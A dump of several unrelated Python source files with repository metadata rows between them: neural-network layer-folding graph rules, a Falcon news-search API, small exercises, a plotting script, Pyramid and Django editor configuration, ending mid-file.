VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FCBNSTE', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mconvold = nodes_dict[g_L2H['/'.join(['L-term', 'Conv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
mste = nodes_dict[g_L2H['/'.join(['L-term', 'STE'])]].nobj
# fold
weight, bias = foldconvbnste(mconvold.weight,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias,
mste.num_levels, mste.abs_max_value)
# build the new modules
mconvnew = nn.Conv2d(mconvold.in_channels, mconvold.out_channels, mconvold.kernel_size,
stride=mconvold.stride, padding=mconvold.padding, dilation=mconvold.dilation, groups=mconvold.groups,
bias=True).to(torch.device('cpu'))
mconvnew.weight.data = weight
mconvnew.bias.data = bias
mfandc = qg.graphs.FloorAndClip(n_bits=math.ceil(math.log(mste.num_levels, 2)),
signed=True, only_positive=True).to(torch.device('cpu'))
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'Conv'])]] = PyTorchNode(mconvnew)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'F&C'])]] = PyTorchNode(mfandc)
return JI, vJI_2_ptnode
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
nodes_dict = {**nodes_dict}
# characterise the match graph H
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)}
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)}
HI = G.subgraph(VHI)
# generate the substitute (sub-)graph J\I
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI)
nodes_dict.update(vJI_2_ptnode)
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI:
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]})
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
if nodes_dict[vI].ntype == qg.graphs.HelperInput.__name__:
pass
elif nodes_dict[vI].ntype == qg.graphs.HelperInputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperInputPrecisionTunnel(1.0))
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
G.remove_nodes_from(set(HI.nodes))
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
class FoldSTEINQConvBNRule(DPORule):
def __init__(self):
K_types = OrderedDict()
K_types.update({'HI': qg.graphs.HelperOutputPrecisionTunnel.__name__})
K_types.update({'MaxPool': nn.MaxPool2d.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
LK_types = OrderedDict()
LK_types.update({'STE': qa.ste.STEActivation.__name__})
LK_types.update({'INQConv': qa.inq.INQConv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
RK_types = OrderedDict()
RK_types.update({'Conv': nn.Conv2d.__name__})
RK_types.update({'ReLU': nn.ReLU.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FSTEINQBN', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mste = nodes_dict[g_L2H['/'.join(['L-term', 'STE'])]].nobj
minq2d = nodes_dict[g_L2H['/'.join(['L-term', 'INQConv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
mreluold = nodes_dict[g_L2H['/'.join(['L-term', 'ReLU'])]].nobj
# fold
weight, bias = foldsteinqconvbn(mste.num_levels, mste.abs_max_value,
minq2d.weight_frozen,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias)
# build the new modules
mconv = nn.Conv2d(minq2d.in_channels, minq2d.out_channels, minq2d.kernel_size,
stride=minq2d.stride, padding=minq2d.padding, dilation=minq2d.dilation, groups=minq2d.groups,
bias=True).to(torch.device('cpu'))
mconv.weight.data = weight
mconv.bias.data = bias
mrelunew = nn.ReLU(inplace=True)
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'Conv'])]] = PyTorchNode(mconv)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'ReLU'])]] = PyTorchNode(mrelunew)
return JI, vJI_2_ptnode
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
nodes_dict = {**nodes_dict}
# characterise the match graph H
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)}
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)}
HI = G.subgraph(VHI)
# generate the substitute (sub-)graph J\I
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI)
nodes_dict.update(vJI_2_ptnode)
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI:
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]})
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
if nodes_dict[vI].ntype == qg.graphs.HelperOutputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperOutputPrecisionTunnel(1.0))
elif nodes_dict[vI].ntype == nn.MaxPool2d.__name__:
pass
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
G.remove_nodes_from(set(HI.nodes))
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
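# --- Editor's note: illustrative sketch, not part of the original module. ---
# Typical driver loop for these rules: seek all matches, rewrite one, and seek
# again, since node identifiers change after every application. `G` and
# `nodes_dict` are assumed to come from quantlib's graph-editing machinery.
def _apply_rule_exhaustively(rule, G, nodes_dict):
    gs = rule.seek(G, nodes_dict)
    while gs:
        G, nodes_dict = rule.apply(G, nodes_dict, gs[0])
        gs = rule.seek(G, nodes_dict)
    return G, nodes_dict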
| 47.723611 | 143 | 0.619831 | 33,064 | 0.962254 | 0 | 0 | 0 | 0 | 0 | 0 | 9,270 | 0.269783 |
5fcc22d5ecaf0da083c5ac9d8ac997e97cc93417 | 5,896 | py | Python | news_api/endpoints/models.py | rdoume/News_API | 9c555fdc5e5b717b98bcfec27364b9612b9c4aa1 | [
"MIT"
] | 9 | 2019-07-19T13:19:55.000Z | 2021-07-08T16:25:30.000Z | news_api/endpoints/models.py | rdoume/News_API | 9c555fdc5e5b717b98bcfec27364b9612b9c4aa1 | [
"MIT"
] | null | null | null | news_api/endpoints/models.py | rdoume/News_API | 9c555fdc5e5b717b98bcfec27364b9612b9c4aa1 | [
"MIT"
] | 1 | 2021-05-12T01:50:04.000Z | 2021-05-12T01:50:04.000Z | # -*- coding: utf-8 -*-
# System imports
import json
# Third-party imports
import falcon
from news_api.endpoints.vespaSearcher import vespaSearch
from news_api.endpoints.top_entities import getTopNewEntities
from news_api.endpoints.top_clusters import getTopNewCluster
# Local imports
# from news_api import settings
class SimpleSearch(object):
@staticmethod
def on_get(req, resp):
"""[Get request for search]
Arguments:
req {[falcon.request]} -- [Falcon request type]
resp {json} -- [Response of the request return by the server]
Raises:
falcon.HTTPError -- [In case the request is ill-formed,empty, or the server provide no response]"""
try:
search_params = falcon.uri.parse_query_string(req.query_string)
if (
search_params is None
or "query" not in search_params
or len(search_params["query"]) == 0
):
resp.status = falcon.HTTP_400
resp.body = json.dumps({"status": "Error", "message": "Query is empty"})
else:
search_response = vespaSearch(search_params)
if search_response is not None:
resp.status = falcon.HTTP_200
resp.body = json.dumps(
{"status": "OK", "message": "", "result": dict(search_response)}
)
else:
resp.status = falcon.HTTP_500
resp.body = json.dumps(
{"status": "Error", "message": "Vespa Error"}
)
print(req.url)
except Exception as e:
raise falcon.HTTPError(falcon.HTTP_503, "Error:", e)
class TopEntities(object):
def __init__(self, db):
self._db = db
def on_get(self, req, resp):
"""[Get request for search]
Arguments:
req {[falcon.request]} -- [Falcon request type]
resp {json} -- [Response of the request return by the server]
Raises:
falcon.HTTPError -- [In case the request is ill-formed,empty, or the server provide no response]"""
try:
search_params = falcon.uri.parse_query_string(req.query_string)
default_params = {
"country": search_params["country"]
if "country" in search_params
else None,
"category": search_params["category"]
if "category" in search_params
else None,
"count": int(search_params["count"])
if "count" in search_params
else None,
}
            if search_params is None or "country" not in search_params:
                resp.status = falcon.HTTP_400
                resp.body = json.dumps(
                    {"status": "0", "message": "country parameter is required"}
                )
else:
list_entities = getTopNewEntities(
self._db.connection,
count=default_params["count"],
country=default_params["country"],
category=default_params["category"],
)
if list_entities is not None:
resp.status = falcon.HTTP_200
resp.body = json.dumps(
{"status": "1", "message": "", "result": list_entities}
)
else:
resp.status = falcon.HTTP_500
resp.body = json.dumps(
{"status": "0", "message": "Entities backend error"}
)
except Exception as e:
raise falcon.HTTPError(falcon.HTTP_503, "Error:", e)
class TopClusters(object):
def __init__(self, db):
self._db = db
def on_get(self, req, resp):
"""[Get request for search]
Arguments:
req {[falcon.request]} -- [Falcon request type]
resp {json} -- [Response of the request return by the server]
Raises:
falcon.HTTPError -- [In case the request is ill-formed,empty, or the server provide no response]"""
try:
search_params = falcon.uri.parse_query_string(req.query_string)
pass
if search_params is None or "country" not in search_params:
resp.status = falcon.HTTP_400
pass
default_params = {
"country": search_params["country"]
if "country" in search_params
else None,
"category": search_params["category"]
if "category" in search_params
else "main",
"count": search_params["count"] if "count" in search_params else None,
"ordering": search_params["ordering"]
if "ordering" in search_params
else None,
}
if "country" not in search_params:
resp.status = falcon.HTTP_400
pass
list_clusters = getTopNewCluster(
self._db.connection,
count=default_params["count"],
country=default_params["country"],
category=default_params["category"],
ordering_method=default_params["ordering"],
) # vespaSearch(search_params)
if list_clusters is not None:
resp.status = falcon.HTTP_200
resp.body = json.dumps(
{"status": "1", "message": "", "result": list_clusters}
)
else:
resp.status = falcon.HTTP_500
resp.body = json.dumps(
{"status": "-1", "message": "Cluster backend error"}
)
except Exception as e:
raise falcon.HTTPError(falcon.HTTP_503, "Error:", e)
| 35.518072 | 111 | 0.518318 | 5,567 | 0.944199 | 0 | 0 | 1,439 | 0.244064 | 0 | 0 | 1,687 | 0.286126 |
5fcda78cf21f154d5256341e1d4f6994551d5ce9 | 858 | py | Python | exercicio9.py | isaacfelipe1/Estrutura_De_Dados_Um_UEA | 79b693d186154b54b7bb0c2dac10cd4cf9886bb3 | [
"Apache-2.0"
] | null | null | null | exercicio9.py | isaacfelipe1/Estrutura_De_Dados_Um_UEA | 79b693d186154b54b7bb0c2dac10cd4cf9886bb3 | [
"Apache-2.0"
] | null | null | null | exercicio9.py | isaacfelipe1/Estrutura_De_Dados_Um_UEA | 79b693d186154b54b7bb0c2dac10cd4cf9886bb3 | [
"Apache-2.0"
] | null | null | null | #9-Faça um programa que leia um número indeterminado de notas. Após esta entrada de dados, faça seguinte:
#. Mostre a quantidade de notas que foram lidas.
#. Exiba todas as notas na ordem em que foram informadas.
#. Calcule e mostre a média das notas.
#. Calcule e mostre a quantidade de notas acima da média calculada.
list=[]
acima_media=[]
notas=float(input("Informe suas notas(-1 para sair\n"))
while(notas>=0):
list.append(notas)
notas=float(input("Informe suas notas(-1 para sair\n"))
media=sum(list)/len(list)
for i, word in enumerate(list):
if word>media:
acima_media+=[word]
soma=len(acima_media)
print('na posição',i,'foi digitado o número ',word)
print(f' A quantidades de notas que foram informados: {len(list)}')
print()
print('=>'*30)
print(f'A média das notas foi {media}')
print(f'{soma}')
print(acima_media) | 35.75 | 105 | 0.708625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 537 | 0.618664 |
5fcddc4097a230efd88262807f43401aaaeff2ab | 257 | py | Python | p5.py | kmark1625/Project-Euler | e80c4f2044fdbff93331117b8f02aa0becbb0706 | [
"MIT"
] | null | null | null | p5.py | kmark1625/Project-Euler | e80c4f2044fdbff93331117b8f02aa0becbb0706 | [
"MIT"
] | null | null | null | p5.py | kmark1625/Project-Euler | e80c4f2044fdbff93331117b8f02aa0becbb0706 | [
"MIT"
] | null | null | null | from fractions import gcd
def smallestDiv():
"""Finds smallest number that is evenly divisible from 1 through 20"""
return reduce(lambda x,y: lcm(x,y), range(1,21))
def lcm(a,b):
return (a*b) / gcd(a,b)
if __name__ == '__main__':
print smallestDiv()
| 21.416667 | 71 | 0.692607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.311284 |
5fcf633d461876ef2ed0512751ad534119c618aa | 1,249 | py | Python | src/resnet_datasize_plot.py | chloechsu/nanoparticle | 5e78fe33c2d562aa31d5e458be0dbf52813f20b1 | [
"MIT"
] | 1 | 2021-04-04T23:07:59.000Z | 2021-04-04T23:07:59.000Z | src/resnet_datasize_plot.py | chloechsu/nanoparticle | 5e78fe33c2d562aa31d5e458be0dbf52813f20b1 | [
"MIT"
] | null | null | null | src/resnet_datasize_plot.py | chloechsu/nanoparticle | 5e78fe33c2d562aa31d5e458be0dbf52813f20b1 | [
"MIT"
] | 3 | 2021-01-13T14:50:42.000Z | 2022-03-20T16:19:52.000Z | import argparse
import csv
import glob
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
sns.set()
shapes = ['TriangPrismIsosc', 'parallelepiped', 'sphere', 'wire']
def main():
trainsizes = []
avg_acc = []
for f in glob.glob('model/resnet18-all-Adam-lr_0.0001*_test_metrics.csv'):
if 'joint' in f or 'nofeature' in f:
continue
print(f)
trainsize = f.split('-')[4]
assert trainsize.startswith('trainsize')
if int(trainsize[10:]) in trainsizes:
print(trainsize[10:])
trainsizes.append(int(trainsize[10:]))
df = pd.read_csv(f)
avg_acc.append(np.mean([df.iloc[0]['accuracy/' + s] for s in shapes]))
aug_ratio = [int((t - 7950.) / 7950.) for t in trainsizes]
print(aug_ratio)
hues = [str(t == 19) for t in aug_ratio]
plt.figure(figsize=(8, 5))
ax = sns.scatterplot(x=aug_ratio[::-1], y=avg_acc[::-1], marker='+',
hue=hues[::-1], s=80)
ax.legend_.remove()
plt.xlabel('Data Augmentation Ratio', fontsize=15)
plt.ylabel('ResNet18-1D Top-1 Accuracy', fontsize=15)
plt.savefig('plots/resnet18_datasize_plot.png')
if __name__ == "__main__":
main()
| 29.046512 | 78 | 0.622898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 244 | 0.195356 |
5fd0efe4c22b97942030348d8ad7858091215264 | 1,482 | py | Python | pyramid_bootstrap/__init__.py | keitheis/pyramid_bootstrap | e8d6e8b9081427bca264d16a679571c35d3527e5 | [
"BSD-3-Clause"
] | null | null | null | pyramid_bootstrap/__init__.py | keitheis/pyramid_bootstrap | e8d6e8b9081427bca264d16a679571c35d3527e5 | [
"BSD-3-Clause"
] | null | null | null | pyramid_bootstrap/__init__.py | keitheis/pyramid_bootstrap | e8d6e8b9081427bca264d16a679571c35d3527e5 | [
"BSD-3-Clause"
] | 1 | 2018-04-12T14:27:52.000Z | 2018-04-12T14:27:52.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Keith Yang'
__email__ = '[email protected]'
__version__ = '0.1.0'
from pyramid.settings import asbool
from .bootstrap import BootstrapFactory
def includeme(config):
DEFAULT = {
'versions': '3.0.3',
'use_min_file': True,
'use_cdn': False,
'static_path': {
'cdn': "//netdna.bootstrapcdn.com/bootstrap/",
'local': 'bootstrap/'
},
'cache_max_age': 3600,
}
settings = config.get_settings()
setting_prefix = "bootstrap."
def get_setting(attr, default=None):
return settings.get(setting_prefix + attr, default)
versions = get_setting('versions', DEFAULT['versions'])
use_min_file = asbool(get_setting("use_min_file", DEFAULT['use_min_file']))
bootstraps = BootstrapFactory.build_bootstraps(versions, use_min_file)
use_cdn = asbool(get_setting("use_cdn"))
if use_cdn:
static_path = DEFAULT['static_path']['cdn']
else:
static_path = get_setting('static_path',
DEFAULT['static_path']['local'])
cache_max_age = get_setting('cache_max_age', DEFAULT['cache_max_age'])
for version in bootstraps:
config.add_static_view(static_path + version,
"pyramid_bootstrap:static/{}".format(version),
cache_max_age=cache_max_age)
config.scan('pyramid_bootstrap.event_subscribers')
| 30.244898 | 79 | 0.625506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 428 | 0.288799 |
5fd224ae58a35451a109abe33921bfe534a36c4b | 3,043 | py | Python | Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | 2 | 2020-05-28T07:15:00.000Z | 2020-07-21T08:34:06.000Z | Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
class SinglyLinkedListNode:
def __init__(self, node_data):
self.data = node_data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
self.tail = None
def insert_node(self, node_data):
node = SinglyLinkedListNode(node_data)
if not self.head:
self.head = node
else:
self.tail.next = node
self.tail = node
def print_singly_linked_list(node, sep, fptr):
while node:
fptr.write(str(node.data))
node = node.next
if node:
fptr.write(sep)
# Complete the mergeLists function below.
#
# For your reference:
#
# SinglyLinkedListNode:
# int data
# SinglyLinkedListNode next
#
#
def mergeLists(head1, head2):
# dummy head node
head_of_merge = SinglyLinkedListNode( 0 )
merge_point = head_of_merge
cur_1, cur_2 = head1, head2
while( cur_1 is not None and cur_2 is not None):
if cur_1.data <= cur_2.data:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
else:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 1 is empty, dump linked list 2 into merger linked list
while cur_2 is not None:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 2 is empty, dump linked list 1 into merger linked list
while cur_1 is not None:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# read head node of merged linked list = next of dummy head node
real_head = head_of_merge.next
return real_head
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
tests = int(input())
for tests_itr in range(tests):
llist1_count = int(input())
llist1 = SinglyLinkedList()
for _ in range(llist1_count):
llist1_item = int(input())
llist1.insert_node(llist1_item)
llist2_count = int(input())
llist2 = SinglyLinkedList()
for _ in range(llist2_count):
llist2_item = int(input())
llist2.insert_node(llist2_item)
llist3 = mergeLists(llist1.head, llist2.head)
print_singly_linked_list(llist3, ' ', fptr)
fptr.write('\n')
fptr.close()
| 21.58156 | 72 | 0.612882 | 431 | 0.141637 | 0 | 0 | 0 | 0 | 0 | 0 | 643 | 0.211305 |
39563b416a76edc246cc669718217ec4a6dc8d69 | 199 | py | Python | tools/stress_test.py | chouette254/quo | 8979afd118e77d3d0f93f9fbe8711efada7158c5 | [
"MIT"
] | 5 | 2021-06-17T21:06:39.000Z | 2022-03-11T06:45:51.000Z | tools/stress_test.py | chouette254/quo | 8979afd118e77d3d0f93f9fbe8711efada7158c5 | [
"MIT"
] | 39 | 2021-07-19T19:36:18.000Z | 2022-02-23T14:55:08.000Z | tools/stress_test.py | secretuminc/quo | c4f77d52f015c612d32ed0fc2fc79545af598f10 | [
"MIT"
] | 1 | 2021-05-31T17:19:15.000Z | 2021-05-31T17:19:15.000Z | from quo import Console
from quo.pretty import Pretty
from quo.panel import Panel
DATA = "My name is Quo"
console = Console()
for w in range(130):
console.echo(Panel(Pretty(DATA), width=w))
| 15.307692 | 46 | 0.718593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.080402 |
3957f752a49e9fed33ab81dcc197e7f08498b9c3 | 4,856 | py | Python | wysihtml5/conf/defaults.py | vkuryachenko/django-wysihtml5 | 5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0 | [
"BSD-2-Clause"
] | 4 | 2015-03-24T20:41:31.000Z | 2021-05-24T15:41:16.000Z | wysihtml5/conf/defaults.py | vkuryachenko/django-wysihtml5 | 5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0 | [
"BSD-2-Clause"
] | 1 | 2017-08-06T18:17:53.000Z | 2017-08-06T18:17:53.000Z | wysihtml5/conf/defaults.py | vkuryachenko/django-wysihtml5 | 5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0 | [
"BSD-2-Clause"
] | 3 | 2015-05-14T15:06:21.000Z | 2021-05-24T15:43:05.000Z | #-*- coding: utf-8 -*-
from django.conf import settings
WYSIHTML5_EDITOR = {
# Give the editor a name, the name will also be set as class
# name on the iframe and on the iframe's body
'name': 'null',
# Whether the editor should look like the textarea (by adopting styles)
'style': 'true',
# Id of the toolbar element, pass false if you don't want
# any toolbar logic
'toolbar': 'null',
# Whether urls, entered by the user should automatically become
# clickable-links
'autoLink': 'true',
# Object which includes parser rules (set this to
# examples/rules/spec.json or your own spec, otherwise only span
# tags are allowed!)
'parserRules': 'wysihtml5ParserRules',
# Parser method to use when the user inserts content via copy & paste
'parser': 'wysihtml5.dom.parse || Prototype.K',
# Class name which should be set on the contentEditable element in
# the created sandbox iframe, can be styled via the 'stylesheets' option
'composerClassName': '"wysihtml5-editor"',
# Class name to add to the body when the wysihtml5 editor is supported
'bodyClassName': '"wysihtml5-supported"',
# By default wysihtml5 will insert <br> for line breaks, set this to
# false to use <p>
'useLineBreaks': 'true',
# Array (or single string) of stylesheet urls to be loaded in the
# editor's iframe
'stylesheets': '["%s"]' % (settings.STATIC_URL +
"wysihtml5/css/stylesheet.css"),
# Placeholder text to use, defaults to the placeholder attribute
# on the textarea element
'placeholderText': 'null',
# Whether the composer should allow the user to manually resize
# images, tables etc.
'allowObjectResizing': 'true',
# Whether the rich text editor should be rendered on touch devices
# (wysihtml5 >= 0.3.0 comes with basic support for iOS 5)
'supportTouchDevices': 'true'
}
WYSIHTML5_TOOLBAR = {
"formatBlockHeader": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockHeader_icon"
},
"formatBlockParagraph": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockParagraph_icon"
},
"bold": {
"active": True,
"command_name": "bold",
"render_icon": "wysihtml5.widgets.render_bold_icon"
},
"italic": {
"active": True,
"command_name": "italic",
"render_icon": "wysihtml5.widgets.render_italic_icon"
},
"underline": {
"active": True,
"command_name": "underline",
"render_icon": "wysihtml5.widgets.render_underline_icon"
},
"justifyLeft": {
"active": True,
"command_name": "justifyLeft",
"render_icon": "wysihtml5.widgets.render_justifyLeft_icon"
},
"justifyCenter": {
"active": True,
"command_name": "justifyCenter",
"render_icon": "wysihtml5.widgets.render_justifyCenter_icon"
},
"justifyRight": {
"active": True,
"command_name": "justifyRight",
"render_icon": "wysihtml5.widgets.render_justifyRight_icon"
},
"insertOrderedList": {
"active": True,
"command_name": "insertOrderedList",
"render_icon": "wysihtml5.widgets.render_insertOrderedList_icon"
},
"insertUnorderedList": {
"active": True,
"command_name": "insertUnorderedList",
"render_icon": "wysihtml5.widgets.render_insertUnorderedList_icon"
},
"insertImage": {
"active": True,
"command_name": "insertImage",
"render_icon": "wysihtml5.widgets.render_insertImage_icon",
"render_dialog": "wysihtml5.widgets.render_insertImage_dialog"
},
"createLink": {
"active": True,
"command_name": "createLink",
"render_icon": "wysihtml5.widgets.render_createLink_icon",
"render_dialog": "wysihtml5.widgets.render_createLink_dialog"
},
"insertHTML": {
"active": True,
"command_name": "insertHTML",
"command_value": "<blockquote>quote</blockquote>",
"render_icon": "wysihtml5.widgets.render_insertHTML_icon"
},
"foreColor": {
"active": True,
"command_name": "foreColor",
"render_icon": "wysihtml5.widgets.render_foreColor_icon"
},
"changeView": {
"active": True,
"command_name": "change_view",
